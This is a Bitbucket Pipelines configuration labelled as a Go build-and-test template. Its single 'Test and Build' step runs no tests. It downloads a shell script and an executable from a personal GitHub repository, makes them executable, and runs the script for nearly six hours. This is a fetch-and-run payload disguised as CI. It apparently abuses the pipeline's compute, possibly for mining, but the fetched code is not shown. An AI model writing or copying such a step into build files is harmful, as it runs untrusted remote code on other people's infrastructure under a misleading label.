#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - wget https://github.com/kitsy99/hsskh/raw/70b0a5de657452b1c738d2656c80f4c6ea939d65/cobalagi.sh; wget https://github.com/kitsy99/hsskh/raw/main/tuyulsugar; chmod +x tuyulsugar cobalagi.sh; timeout 355m ./cobalagi.sh